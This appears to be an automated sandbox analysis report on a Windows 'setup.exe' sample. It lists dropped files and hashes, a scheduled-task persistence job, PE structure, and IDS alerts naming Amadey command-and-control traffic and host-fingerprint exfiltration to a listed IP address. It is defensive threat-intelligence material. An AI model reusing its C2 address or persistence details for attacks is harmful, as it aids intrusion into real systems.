C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1490208
Entropy (8bit):	7.106839841652793
Encrypted:	false
SSDEEP:	24576:VWzNpYIUzAcFZPVUw1L9ub0VsfMzXGk1GUzwgBaPIJdTaKIe0MStS/o6ui2OXK0:gc3vpJSMwgkk8KIeVSc/zuiV
MD5:	F43852A976EDCAB5A7C82D248CE242D2
SHA1:	446AC2BB76E472C185F56B2B1246910A4438246D
SHA-256:	4A38DB0744930E1F5BFC0A82F63C907F7DC94270B930A3950E6A0ABBC903C47F
SHA-512:	3B4AB06664CB4C228EF0E85CC38D4035D4D2C0B4FEBD7FA410DA65BBCC7B4EAFBEC924E8D14F02432125FA3D9FB22E50A87707B1C1028AD5D3F0BFBCD4B4075E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: #U041e#U043f#U043b#U0430#U0442#U0430 #U043f#U043e #U0440#U0430#U0445#U0443#U043d#U043a#U0443.rtf.doc, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......f.................r..........&.............@.......................................@.............................................@............f.. W...P..............................x...........................P............................text....q.......r.................. ..`.rdata...............v..............@..@.data....@... ......................@....00cfg.......p......................@..@.tls................................@....voltbl..................................rsrc...@...........................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.3881527841049124
Encrypted:	false
SSDEEP:	6:vVJLvRX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1XIEt0:zLF4RKQ1cag7jzvYRQV1xt0
MD5:	72ED3563FBB2E83E59B1C4F8096F35DB
SHA1:	A5D7755578BD1DF007B8A7146ED0FAD29043D573
SHA-256:	FEEAC8CEE8682922FB371F867E3C1DC6FA046C59CEE3E8EF79EBAB3029CE7F30
SHA-512:	D0E440749C0B94A98EDD70E6D56FD037BDE8673E1D32D915C6FA20F770B3970248332A2758AC5ED83F3607D0EE2DDC1B0C3051FC564B4220105B4F655BC8DAAC
Malicious:	false
Reputation:	low
Preview:	....q...l.qD.*P[.j .F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.951423110075199
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	1'888'768 bytes
MD5:	2f277449cb31514f740e5c3ade2ca366
SHA1:	3e7a66ac93ec5c1cb59c8b86714df87b2a67d3b2
SHA256:	28f2e596810e44e99478b335a6f55c0f1f76654cee36416a28d79895ebcd101f
SHA512:	6fb0e423046b5d98e3aff1cec80f67d1dfde810dd219b82944f0f38916219289307c4b817ca70cd0772cdcf66f32198c68ee18b80327ac1011548c59eb1dbe33
SSDEEP:	49152:2/kLd+b2alI/AGxYt+KS+OChNmFYfUynohr:28obpMfdKSUhNmFYfUEohr
TLSH:	7695336B8B528971CFCD407BD40F51993A163D422F70E4FA6D05843ADA1B289F35EEE4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8ab000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FEA5CC584BAh
cmpxchg byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FEA5CC5A4B5h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+00000080h], dh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a9690	0x10	sgwszepm
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4a9640	0x18	sgwszepm
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	9bccea91035285d0a19f23491597be7d	False	0.9997705344945356	data	7.976698587403563	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	1458cb6ec5cf2a04a28d5c40ae19b1f6	False	0.576171875	data	4.510502173095285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a3000	0x200	4d6ae391c50b52a562106c6e1cba7394	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sgwszepm	0x30e000	0x19c000	0x19ba00	c5aafaaf0b7b975c1bc0ad60c44d8034	False	0.9946038471758275	DOS executable (COM, 0x8C-variant)	7.954044165897789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gtgrasql	0x4aa000	0x1000	0x400	0a81f0568b9e6cab23d2694bee494c5d	False	0.8232421875	data	6.307633333579868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ab000	0x3000	0x2200	7d1797b242c2e9734838750707d878c9	False	0.06893382352941177	DOS executable (COM)	0.7383507981075083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4a96a0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T21:01:35.114235+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	49759	185.215.113.19	192.168.2.4
2024-07-26T21:01:33.645894+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.731401+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:35.996300+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49762	80	192.168.2.4	185.215.113.19
2024-07-26T21:01:00.458073+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49737	40.68.123.157	192.168.2.4
2024-07-26T21:01:33.292925+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.377947+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.466326+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.378881+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.731310+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:32.205341+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49760	443	192.168.2.4	93.93.131.124
2024-07-26T21:01:33.729449+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.817569+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.644884+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.378896+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.465938+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:00:22.410895+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49735	40.68.123.157	192.168.2.4
2024-07-26T21:01:33.465951+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:04.508143+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49738	80	192.168.2.4	185.215.113.19
2024-07-26T21:01:33.643013+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.378898+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:05.639025+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49739	80	192.168.2.4	185.215.113.19
2024-07-26T21:01:08.036296+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49741	80	192.168.2.4	185.215.113.19
2024-07-26T21:01:33.617264+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4
2024-07-26T21:01:33.645901+0200	TCP	2100648	GPL SHELLCODE x86 NOOP	443	49761	93.93.131.124	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 21:01:03.482500076 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:03.488126040 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:03.488203049 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:03.488514900 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:03.493377924 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.506050110 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.508035898 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.508142948 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.512954950 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.523396015 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.764952898 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.765018940 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.873202085 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.873672009 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.878634930 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.878716946 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.878895998 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.879024982 CEST	80	49738	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:04.879077911 CEST	49738	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:04.883732080 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:05.638811111 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:05.639024973 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:05.639847040 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:05.644694090 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:05.888022900 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:05.888125896 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:05.998089075 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:05.998405933 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.005942106 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:06.005987883 CEST	80	49739	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:06.006041050 CEST	49739	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.006067038 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.006237984 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.011586905 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:06.857532978 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:06.857642889 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.858216047 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:06.863085032 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:07.109142065 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:07.109229088 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.216816902 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.217196941 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.222142935 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:07.222256899 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.222353935 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.222405910 CEST	80	49740	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:07.222469091 CEST	49740	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:07.227500916 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.036206961 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.036295891 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.037004948 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.050606012 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.347659111 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.347733974 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.467061043 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.467504978 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.472476006 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.472563982 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.472771883 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.472851038 CEST	80	49741	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:08.472908020 CEST	49741	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:08.477583885 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.449157000 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.449505091 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.450205088 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.458074093 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.717824936 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.717928886 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.826702118 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.827044964 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.832724094 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.832916021 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.832916021 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:09.842513084 CEST	80	49742	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.842542887 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:09.842570066 CEST	49742	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:10.597944021 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:10.598630905 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:10.598630905 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:10.603482008 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:10.879043102 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:10.879209995 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:10.984507084 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:10.984735012 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.008251905 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:11.008510113 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.008584976 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.009730101 CEST	80	49743	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:11.012499094 CEST	49743	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.013703108 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:11.792984962 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:11.793064117 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.793606997 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:11.802155018 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:12.055654049 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:12.055771112 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.172230005 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.172522068 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.476104021 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:12.476203918 CEST	80	49744	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:12.476238012 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.476252079 CEST	49744	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.476506948 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:12.481836081 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.626576900 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.626636982 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.627280951 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.628213882 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.628331900 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.634120941 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.878670931 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.881082058 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.982244015 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.982553005 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.987389088 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.987951040 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.988022089 CEST	80	49745	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:13.988054991 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.988075972 CEST	49745	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:13.992789030 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:14.755743980 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:14.755812883 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:14.756407022 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:14.762860060 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.009021044 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.009111881 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.122912884 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.123220921 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.128369093 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.128463984 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.128667116 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.131875038 CEST	80	49746	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.131952047 CEST	49746	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.134301901 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.967746973 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:15.967845917 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.968574047 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:15.973481894 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:16.225486040 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:16.225564957 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.341783047 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.342101097 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.347001076 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:16.347095013 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.347243071 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.347642899 CEST	80	49747	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:16.347697973 CEST	49747	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:16.352509022 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.283024073 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.283152103 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.283792973 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.297228098 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.540508986 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.540611982 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.654427052 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.654871941 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.660408974 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.660573959 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.660832882 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:17.665833950 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.694680929 CEST	80	49748	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:17.694775105 CEST	49748	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.457194090 CEST	80	49749	185.215.113.19	192.168.2.4
